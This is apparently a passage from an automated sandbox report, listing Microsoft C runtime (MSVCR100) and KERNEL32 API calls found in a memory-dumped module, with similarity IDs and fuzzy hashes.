                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100(6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003,?), ref: 6FDF43D2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ValidateWrite@@$AdjustPointermemmove$?_inconsistency@@
                                                                                                          • String ID:
                                                                                                          • API String ID: 4636599-0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo$_access_s_ismbstrail_ismbstrail_lstrnlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1943728259-0
                                                                                                          APIs
                                                                                                          • _getptd.MSVCR100(00000004,6FDF4967,?,?,E06D7363,1FFFFFFF,19930522), ref: 6FDF3FE8
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100 ref: 6FDF3FF6
                                                                                                            • Part of subcall function 6FDF3874: DecodePointer.KERNEL32(6FDF38B0,00000008,6FDF43D7,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003), ref: 6FDF3886
                                                                                                            • Part of subcall function 6FDF3874: ?terminate@@YAXXZ.MSVCR100(?,00000000,00000003,?), ref: 6FDF38A6
                                                                                                          • ?unexpected@@YAXXZ.MSVCR100 ref: 6FDF3FFF
                                                                                                          • ?terminate@@YAXXZ.MSVCR100 ref: 6FDF400A
                                                                                                          • _getptd.MSVCR100 ref: 6FDF400F
                                                                                                          • _CxxThrowException.MSVCR100(00000000,00000000), ref: 6FDF4021
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100(?,00000000,?,00000000,00000000), ref: 6FDF4035
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100(?,00000000,?,00000000,00000000), ref: 6FDF4040
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100(?,00000000,?,00000000,00000000), ref: 6FDF406B
                                                                                                          • ?raw_name@type_info@@QBEPBDXZ.MSVCR100(0000005E,?,00000000,?,00000000,00000000), ref: 6FDF4089
                                                                                                          • strcmp.MSVCR100(00000000,0000005E,?,00000000,?,00000000,00000000), ref: 6FDF408F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ?_inconsistency@@$?terminate@@_getptd$?raw_name@type_info@@?unexpected@@DecodeExceptionPointerThrowstrcmp
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 2020455154-1018135373
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_gmtime64_s$_invalid_parameter_noinfo$_get_daylight_get_dstbias_get_timezonememset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3362392949-0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$strncat_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 2901470385-0
                                                                                                          APIs
                                                                                                          • wcsnlen.MSVCR100(?,?,?,?,?,?,?,?,6FD8CC8D,?,?,?), ref: 6FD8CC20
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,6FD8CC8D,?,?,?), ref: 6FDAC847
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6FD8CC8D,?,?,?), ref: 6FDAC851
                                                                                                          • __crtLCMapStringW.MSVCR100(?,00000200,?,000000FF,00000000,00000000,?,?,?,?,?,?,6FD8CC8D,?,?,?), ref: 6FDAC86E
                                                                                                          • _errno.MSVCR100(?,?,6FD8CC8D,?,?,?), ref: 6FDAC87F
                                                                                                          • _errno.MSVCR100(?,?,6FD8CC8D,?,?,?), ref: 6FDAC88A
                                                                                                          • _errno.MSVCR100(?,?,6FD8CC8D,?,?,?), ref: 6FDAC8A0
                                                                                                          • malloc.MSVCR100(00000008,?,?,6FD8CC8D,?,?,?), ref: 6FDAC8D8
                                                                                                          • _errno.MSVCR100(?,?,6FD8CC8D,?,?,?), ref: 6FDAC8F4
                                                                                                          • __crtLCMapStringW.MSVCR100(?,00000200,?,000000FF,00000000,00000000,?,?,6FD8CC8D,?,?,?), ref: 6FDAC90F
                                                                                                          • wcscpy_s.MSVCR100(?,?,00000000,?,?,?,?,?,?,?,?,6FD8CC8D,?,?,?), ref: 6FDAC920
                                                                                                          • _freea_s.MSVCR100(00000000,?,?,?,?,?,?,?,?,6FD8CC8D,?,?,?), ref: 6FDAC939
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$String__crt$_freea_s_invalid_parameter_noinfomallocwcscpy_swcsnlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 727409626-0
                                                                                                          APIs
                                                                                                          • _malloc_crt.MSVCR100(00000355,00000000,6FD85249,00000001,00000000,00000000), ref: 6FD84DA4
                                                                                                            • Part of subcall function 6FD80B31: malloc.MSVCR100(00000001,00000001,00000001,?,6FD8A974,00000018,6FD8A948,0000000C,6FDA74F7,00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD80B3D
                                                                                                            • Part of subcall function 6FD84D56: strcat_s.MSVCR100(6FD86E28,6FD86E07,6FD86E18,?,00000083,00000083,?,6FD86E1C,6FD86E07,6FD86E28,00000002,6FD86E28,6FD86E07,?,00000000,00000000), ref: 6FD84D75
                                                                                                          • strcat_s.MSVCR100(00000004,00000351,6FD84D54,?,?,?,?,?,00000000,6FD85249,00000001,00000000), ref: 6FD84DF1
                                                                                                          • strcmp.MSVCR100(00000000,00000010,?,?,?,?,?,?,?,?,00000000,6FD85249,00000001,00000000), ref: 6FD84E0E
                                                                                                          • free.MSVCR100(6FD85249,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6FD84E55
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6FD85249,00000001), ref: 6FDB0BD1
                                                                                                          • free.MSVCR100(?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6FD85249), ref: 6FDB0BD9
                                                                                                          Similarity
                                                                                                          • API ID: freestrcat_s$_invoke_watson_malloc_crtmallocstrcmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 350293339-0
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(?,?,00000000), ref: 6FDD0399
                                                                                                          • _errno.MSVCR100(?,?,00000000), ref: 6FDD03A4
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,00000000), ref: 6FDD03AF
                                                                                                          • _getdrive.MSVCR100(?,?,00000000), ref: 6FDD03B9
                                                                                                          • _errno.MSVCR100(?,?,00000000), ref: 6FDD03C8
                                                                                                          • GetFullPathNameW.KERNEL32(?,00000000,?,?,?,?,00000000), ref: 6FDD0423
                                                                                                          • _errno.MSVCR100(?,?,00000000), ref: 6FDD0436
                                                                                                          Similarity
                                                                                                          • API ID: _errno$FullNamePath__doserrno_getdrive_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2522281643-0
                                                                                                          APIs
                                                                                                          • free.MSVCR100(?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294,-0000006C), ref: 6FD8A3C4
                                                                                                          • free.MSVCR100(?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294,-0000006C), ref: 6FD96EFC
                                                                                                          • free.MSVCR100(?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294,-0000006C), ref: 6FD96F1D
                                                                                                          • free.MSVCR100(?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294,-0000006C), ref: 6FD96F35
                                                                                                          • free.MSVCR100(?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294,-0000006C), ref: 6FD96F40
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: free
                                                                                                          • String ID: PHo
                                                                                                          • API String ID: 1294909896-431488675
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo$_waccess_swcsnlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2205256078-0
                                                                                                          APIs
                                                                                                          • GetFullPathNameA.KERNEL32(?,?,00000000,?), ref: 6FD926E2
                                                                                                          • GetFullPathNameA.KERNEL32(?,00000000,00000000,00000000), ref: 6FDA7A58
                                                                                                          • GetLastError.KERNEL32 ref: 6FDA7A5E
                                                                                                          • _dosmaperr.MSVCR100(00000000), ref: 6FDA7A65
                                                                                                          • _errno.MSVCR100 ref: 6FDA7A7F
                                                                                                          • calloc.MSVCR100(?,00000001), ref: 6FDA7A94
                                                                                                          • _errno.MSVCR100 ref: 6FDA7AA5
                                                                                                          • _errno.MSVCR100 ref: 6FDA7AB2
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDA7ABD
                                                                                                          • free.MSVCR100(00000000), ref: 6FDA7ACB
                                                                                                          • _errno.MSVCR100 ref: 6FDA7AD1
                                                                                                          • free.MSVCR100(00000000), ref: 6FDA7AE8
                                                                                                          • _getcwd.MSVCR100(?,?), ref: 6FDA7AF9
                                                                                                          Similarity
                                                                                                          • API ID: _errno$FullNamePathfree$ErrorLast_dosmaperr_getcwd_invalid_parameter_noinfocalloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1400498114-0
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: :
                                                                                                          • API String ID: 0-336475711
                                                                                                          APIs
                                                                                                          • EncodePointer.KERNEL32(?,00000000,00000000), ref: 6FD8C753
                                                                                                          • _malloc_crt.MSVCR100(?), ref: 6FD8C76F
                                                                                                          • ?terminate@@YAXXZ.MSVCR100(00000000,00000000), ref: 6FD8C7A0
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: ?terminate@@EncodePointer_malloc_crt
                                                                                                          • String ID: bad allocation$csm
                                                                                                          • API String ID: 1737418049-2003371537
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Similarity
                                                                                                          • API ID: _getptd$MatchType
                                                                                                          • String ID: MOC$RCC$csm$csm
                                                                                                          • API String ID: 965401092-1441736206
                                                                                                          • Opcode ID: a8c60d8e1276021d7158493a35427765fadefa4f5b660dad636263f93ba6c187
                                                                                                          • Instruction ID: eb0961b712f12ec328403ffc8eba633cd76261d238561fa49d6245b9fd6dd65a
                                                                                                          • Opcode Fuzzy Hash: a8c60d8e1276021d7158493a35427765fadefa4f5b660dad636263f93ba6c187
                                                                                                          • Instruction Fuzzy Hash: C431C235504704CFCBA0CFA8C440BA973B8AF01354F94466BD8A98B251D736F544CF96
                                                                                                          APIs
                                                                                                          • _calloc_crt.MSVCR100(00000008,00000001), ref: 6FDFBFDE
                                                                                                          • _errno.MSVCR100 ref: 6FDFBFEB
                                                                                                          • _calloc_crt.MSVCR100(000000D8,00000001), ref: 6FDFC002
                                                                                                          • free.MSVCR100(00000000), ref: 6FDFC010
                                                                                                          • _calloc_crt.MSVCR100(00000220,00000001), ref: 6FDFC01E
                                                                                                          • free.MSVCR100(00000000), ref: 6FDFC02E
                                                                                                          • free.MSVCR100(00000000,00000000), ref: 6FDFC034
                                                                                                          • free.MSVCR100(00000000,00000000,00000000), ref: 6FDFC069
                                                                                                          • free.MSVCR100(?), ref: 6FDFC089
                                                                                                          • free.MSVCR100(00000000,00000000,00000000,?), ref: 6FDFC09D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Similarity
                                                                                                          • API ID: free$_calloc_crt$_errno
                                                                                                          • String ID: Jo
                                                                                                          • API String ID: 2061585734-2441139153
                                                                                                          • Opcode ID: 51ed242ac5b3af2c2fa6d5bfb5414f20117f156e6831a3a2abb6d3d6ef2da11b
                                                                                                          • Instruction ID: 389c75236d8f2ef1d9828182a650a697c551c5245e602a880b0478cd83948347
                                                                                                          • Opcode Fuzzy Hash: 51ed242ac5b3af2c2fa6d5bfb5414f20117f156e6831a3a2abb6d3d6ef2da11b
                                                                                                          • Instruction Fuzzy Hash: 90214C36106701EBE3A21F29DC04D0B7FE5DF42374B214119E4A48B1E0EF32B8529A74
                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 6FDCAA6B
                                                                                                          • GetModuleFileNameW.KERNEL32(6FD70000,?,00000104), ref: 6FDCAA87
                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 6FDCAA98
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCAAAF
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDCAACA
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000), ref: 6FDCAADB
                                                                                                          • CreateThread.KERNEL32(00000000,-00000018,6FDC0EC3,00010000,6FDC0EB1,?), ref: 6FDCAB1D
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCAB27
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDCAB3F
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000), ref: 6FDCAB4D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Similarity
                                                                                                          • API ID: ??0scheduler_resource_allocation_error@Concurrency@@ErrorExceptionLastModuleThrow$CreateFileHandleLibraryLoadNameThread
                                                                                                          • String ID: \so
                                                                                                          • API String ID: 3046512301-3095705423
                                                                                                          • Opcode ID: 0d961f0e0f8f990d8ccacd1fa177c6df9945001e6591c4807df8ad67024aefcf
                                                                                                          • Instruction ID: 22ddb8e045a684ada68c92d1bc3f69b7aabc1cb556db8e5960a9f96380b55775
                                                                                                          • Opcode Fuzzy Hash: 0d961f0e0f8f990d8ccacd1fa177c6df9945001e6591c4807df8ad67024aefcf
                                                                                                          • Instruction Fuzzy Hash: 7321F171600309ABEF889FA0CC59BAE3BB8BF04310F240169F516DB180EB34FA119B61
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100 ref: 6FDD020C
                                                                                                          • _errno.MSVCR100 ref: 6FDD0214
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD021F
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 6FDD022F
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 6FDD0249
                                                                                                          • _calloc_crt.MSVCR100(00000001,00000002), ref: 6FDD025F
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000001,00000000), ref: 6FDD027C
                                                                                                          • towupper.MSVCR100(0000003D), ref: 6FDD02A6
                                                                                                          • SetEnvironmentVariableW.KERNEL32(?,?), ref: 6FDD02C2
                                                                                                          • free.MSVCR100(?), ref: 6FDD02EE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Similarity
                                                                                                          • API ID: CurrentDirectory$EnvironmentVariable__doserrno_calloc_crt_errno_invalid_parameter_invalid_parameter_noinfofreetowupper
                                                                                                          • String ID:
                                                                                                          • API String ID: 2646161260-0
                                                                                                          • Opcode ID: a5eb038a2e6790800acef624143eb1d6f92221bb223f4da6b75db3b6840d31de
                                                                                                          • Instruction ID: eeb7a091cb41d78ed766e83f84e8b7c4e9152e0489e524c8f474b394e5c1aa16
                                                                                                          • Opcode Fuzzy Hash: a5eb038a2e6790800acef624143eb1d6f92221bb223f4da6b75db3b6840d31de
                                                                                                          • Instruction Fuzzy Hash: 9C31D635942318DADB509BB4DC4CBDE7FB8AF853A4F10514AF425D71C4DB70BA818BA4
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4DAB
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4DB6
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                            • Part of subcall function 6FDD4EBE: __p__iob.MSVCR100(6FDD4EB5,6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4EBE
                                                                                                          • __p__iob.MSVCR100(6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4DCD
                                                                                                          • __p__iob.MSVCR100(6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4DE0
                                                                                                          • _fgetwc_nolock.MSVCR100(00000000,6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4DE6
                                                                                                          • __p__iob.MSVCR100(6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4E2B
                                                                                                          • _fgetwc_nolock.MSVCR100(00000000,6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4E31
                                                                                                          • __p__iob.MSVCR100(6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4E5D
                                                                                                          • _fgetwc_nolock.MSVCR100(00000000,6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4E63
                                                                                                          • _errno.MSVCR100(6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4E7C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4E87
                                                                                                          • _local_unwind4.MSVCR100(6FE24610,?,000000FE,6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4E97
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Similarity
                                                                                                          • API ID: __p__iob$_fgetwc_nolock$_errno_invalid_parameter_noinfo$_invalid_parameter_local_unwind4
                                                                                                          • String ID:
                                                                                                          • API String ID: 3505425107-0
                                                                                                          • Opcode ID: 0346c3170767eed59fcb00e77566b8ee8157843075a7950bc77472746b4b4e13
                                                                                                          • Instruction ID: 0fd2900f866be96abc171df4df73b2f9af79f37a91fb76d30cd8382ddd3b8519
                                                                                                          • Opcode Fuzzy Hash: 0346c3170767eed59fcb00e77566b8ee8157843075a7950bc77472746b4b4e13
                                                                                                          • Instruction Fuzzy Hash: A8316D70914355EADBA09FB4D8417AD77B0BF06328F20462AF469EB2C0DB39F5808B75
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD87E8,00000010,6FDD883A,00000000,?,00000002,7FFFFFFF,00000000), ref: 6FDD86B2
                                                                                                          • _errno.MSVCR100(6FDD87E8,00000010,00000000,00000000,00000000,00000000,00000000,?,?,?,?,6FE28448,00000012,00000000), ref: 6FDD86CD
                                                                                                          • _lock.MSVCR100(00000002,6FDD87E8,00000010,6FDD883A,00000000,?,00000002,7FFFFFFF,00000000), ref: 6FDD86DB
                                                                                                          • _waccess_s.MSVCR100(6FE28448,00000000,6FDD87E8,00000010,6FDD883A,00000000,?,00000002,7FFFFFFF,00000000), ref: 6FDD8721
                                                                                                          • _errno.MSVCR100(6FDD87E8,00000010,6FDD883A,00000000,?,00000002,7FFFFFFF,00000000), ref: 6FDD87BF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_lock_waccess_s
                                                                                                          • String ID: "
                                                                                                          • API String ID: 2132282830-123907689
                                                                                                          • Opcode ID: 21c0553eab269b46701bcb1e32951143f7c338a82e52f06f036996fcb14332be
                                                                                                          • Instruction ID: 2c61e3ed8a1fa056a4e716e346c0372a6ab6d41d1b81ca3af05b00b19abf853e
                                                                                                          • Opcode Fuzzy Hash: 21c0553eab269b46701bcb1e32951143f7c338a82e52f06f036996fcb14332be
                                                                                                          • Instruction Fuzzy Hash: F631D37598C35AFBDB926F64C880A9E37B0AF05324F10641AF9246B6C0D770B9818B61
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD6B18,00000010,6FDD6B6A,00000000,?,00000002,7FFFFFFF,00000000), ref: 6FDD69E7
                                                                                                          • _errno.MSVCR100(6FDD6B18,00000010,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,6FE283F4,00000012), ref: 6FDD6A02
                                                                                                          • _lock.MSVCR100(00000002,6FDD6B18,00000010,6FDD6B6A,00000000,?,00000002,7FFFFFFF,00000000), ref: 6FDD6A10
                                                                                                          • _access_s.MSVCR100(6FE283F4,00000000,6FDD6B18,00000010,6FDD6B6A,00000000,?,00000002,7FFFFFFF,00000000), ref: 6FDD6A55
                                                                                                          • _errno.MSVCR100(6FDD6B18,00000010,6FDD6B6A,00000000,?,00000002,7FFFFFFF,00000000), ref: 6FDD6AED
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_access_s_lock
                                                                                                          • String ID: "
                                                                                                          • API String ID: 1561533809-123907689
